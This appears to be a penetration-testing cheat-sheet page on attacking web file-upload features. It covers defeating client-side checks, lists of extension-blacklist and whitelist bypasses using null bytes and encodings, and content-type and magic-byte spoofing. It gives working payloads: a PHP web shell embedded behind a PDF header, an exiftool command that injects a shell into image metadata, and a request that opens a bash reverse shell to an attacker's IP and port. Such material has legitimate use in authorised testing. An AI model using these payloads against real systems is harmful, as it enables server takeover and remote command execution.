File Upload

Bypassing client-side restrictions

Delete the HTML containing the file type validation function, and it will allow us to upload the file.

Bypassing a file extension blacklist

Blacklists are another approach developers tend to take to restrict file uploads. And, perhaps he/she might have thought about all the malicious file extensions, there's always that one obscure extension that little to no one knows about.

Let's take a look at some common bypasses:

.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg

Bypassing a file extension whitelist

The approach to bypassing a whitelist differs a bit from the aforementioned case. Here, we will need to take advantage of an existing allow list that has strictly defined extensions or find any flaws in the parsing method or the regex pattern that has been used.

Let's take a look at some more bypasses, including ones with special encodings to take advantage of any loosely scoped regex pattern:

PHP Upload Filter Bypasses

<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg

Bypassing content type restrictions

Another approach developers take to restrict malicious files is by validating the content type of your uploaded file. In this case, we can attempt to set the content type to any allowed MIME type while leaving the file extension to our desired file type:

Magic bytes

The first few bytes (characters) of the contents of the file determine and identify the file type. These are also called magic bytes, magic numbers or file signatures in general.

Developers use these to validate the document and disregard the other parameters such as content type or file extension. Luckily for us, we can upload a file that passes through this validation with our malicious payload.

PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

%PDF-1.4

<?php system($_GET["cmd"]); ?>

http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

PHP into JPG Injection

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' <FILE>.png

Overwriting server configuration files

Suppose your target uses Apache to serve content over HTTP. Apache supports .htaccess configuration files. After we've figured out where our files are saved, we can attempt to either overwrite an existing .htaccess configuration file or create a new one.

PHP RCE

<?php echo system($_GET['cmd']); ?>

http://<RHOST>/test.php?cmd=whoami

If we see the output:

http://<RHOST>/test.php?cmd=bash+-c+'exec+bash+-i+%26>/dev/tcp/IP/PORT+<%261'

PreviousXXE NextFile Inclusion

Last updated 4 months ago

hashtagBypassing client-side restrictions

hashtagBypassing a file extension blacklist

hashtagBypassing a file extension whitelist

hashtagPHP Upload Filter Bypasses

hashtagBypassing content type restrictions

hashtagMagic bytes

hashtagPDF PHP Inclusion

hashtagPHP into JPG Injection

hashtagOverwriting server configuration files

hashtagPHP RCE